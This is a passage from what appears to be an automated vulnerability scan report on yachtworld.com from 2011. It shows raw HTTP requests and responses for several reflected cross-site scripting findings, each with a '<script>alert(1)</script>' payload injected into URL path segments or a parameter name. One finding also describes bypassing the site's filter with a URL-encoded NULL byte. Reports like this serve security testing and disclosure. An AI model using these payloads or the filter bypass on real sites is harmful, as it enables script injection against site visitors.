Set-Cookie: VIEWED_BOATS_STORE=1990703%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B129%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F9%2F0%2F7%2F1990703_1_mini.jpg%3F1184600846000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-Center-Console-1990703%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:43 GMT
Set-Cookie: VIEWED_BOATS_STORE=1990703%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B129%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F9%2F0%2F7%2F1990703_1_mini.jpg%3F1184600846000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-Center-Console-1990703%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=1990703&boat_id=1990703&back=/core/boats/2005/Regulator-32-Fs-Center-Console-1990703/Bricka53ce"><script>alert(1)</script>94ac4aa25e6/NJ/United-States&boat_id=1990703">
...[SNIP]...

3.130. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1993"><script>alert(1)</script>bce16822595 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJa1993"><script>alert(1)</script>bce16822595/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:22 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 17 Dec 2010 17:08:15 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1990703%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B129%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F9%2F0%2F7%2F1990703_1_mini.jpg%3F1184600846000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-Center-Console-1990703%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:22 GMT
Set-Cookie: VIEWED_BOATS_STORE=1990703%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B129%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F9%2F0%2F7%2F1990703_1_mini.jpg%3F1184600846000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-Center-Console-1990703%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=1990703&boat_id=1990703&back=/core/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJa1993"><script>alert(1)</script>bce16822595/United-States&boat_id=1990703">
...[SNIP]...

3.131. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb8a8"><script>alert(1)</script>5f82de3500 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-Statescb8a8"><script>alert(1)</script>5f82de3500 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:56 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 17 Dec 2010 17:08:15 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1990703%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B129%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F9%2F0%2F7%2F1990703_1_mini.jpg%3F1184600846000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-Center-Console-1990703%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:55 GMT
Set-Cookie: VIEWED_BOATS_STORE=1990703%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B129%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F9%2F0%2F7%2F1990703_1_mini.jpg%3F1184600846000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-Center-Console-1990703%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=1990703&boat_id=1990703&back=/core/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-Statescb8a8"><script>alert(1)</script>5f82de3500&boat_id=1990703">
...[SNIP]...

3.132. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005dd35"><script>alert(1)</script>4deefd4b163 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5dd35"><script>alert(1)</script>4deefd4b163 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States?%005dd35"><script>alert(1)</script>4deefd4b163=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; 